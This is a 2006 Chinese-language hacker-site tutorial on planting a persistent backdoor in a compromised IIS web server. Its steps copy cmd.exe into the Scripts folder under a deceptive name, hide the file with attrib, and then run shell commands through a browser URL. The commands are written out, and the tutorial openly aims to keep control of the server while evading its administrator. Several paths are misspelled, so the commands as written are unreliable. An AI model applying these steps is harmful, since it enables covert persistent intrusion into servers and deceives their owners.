|
中华网络安全联盟 作者:佚名 来源:网络 时间:2006-3-19
黑客炼狱
www.down98.com
制作:
站长:☆⿺幽靈客棧
~~~~~~~~~~
欢迎大家到本站学习相关黑客技术。
~~~~~~~~~~~~~~~~
假设入者目前已经获得了远程服务器的管理员权限,并可以自己控制远程服务器,为了了
永久控制该服务器,入侵者可以在本没有Unicode漏洞的服务器上来制造出一个Unicode漏洞
下面来详细介绍一下具体过程:
为了把cmd.exe拷贝到远程服务器的Web目录中,入侵都的主要侨务是先找到IIS的根目录里
。在默认情况下,IIS服务器的根目录的路径为以:C:\Inetpub\,因此可以先在该路径下试试
看,或者使用命令dir<文件名> /f来定位IIS服务器的根目录,其中参数<文件名 >是该
Web服务器下存在的文件,命令dir和/f配合使用表示查找指定文件,并列出该文件的路径,
至于参数<文件名>如何获得,可以通过浏览服务器的网站得到,也可以使用向个默认的文件
名,
通过上述过程,假设远程服务器的iis根目录是c:\Inetpub\.
步骤二:拷贝cmd.exe到iis目录中。
为了能通过IE浏览到程序cmd.exe,入侵者需要把服务器的cmd.exe拷贝到到iis根目录中,因为
在默认情况下,iis根目录可以被web服务器访问,在iis根目录中,Scripts目录是专门用来存放
脚本文件的,也就是说在默认情况下,iis允许客户端执行这里的程序。这本来是给客户提供交互
式服务而建立的,然而却恰恰被入侵者所得用。
下面就把服务器winnt\systen32目录的cmd.exe拷贝到Sceipts目录中,并改名为_iis.exe,目的
是迷惑管理员。copy c:\winnt\systom32\cmd.exe c:\Inetput\Seripts\_iis.exe
步骤三:隐藏文件。
入侵者们总是尽量隐蔽自己的行踪,不让管理员发现他们对系统所做的任何修改。关于如何隐藏
文件我这里就不仔细介绍了。你可以到本站去下到相关资料。这里使用其中的一个方法,通过attrib
命令为文件添加“系统”,“隐藏”属性,attrib +h +s c:\Inetpub\Seripts\_iis.exe:
步骤四:验证后门的可用性。
通过上述过程,“漏洞后门”就已制作完毕了,一面来验证一下该后门的可用性。先打开ie浏览
器,然后在ie浏览器输入"http://192.168.245.137\Scripts\_iis.exe?/c+dir+c:\",提到回显
如下。
显示说明我们已成功的制作了一个"Unicode漏洞“好了教程就到这里,别的漏洞制作方法我们会
在本站上发布的,尽请关注。
|
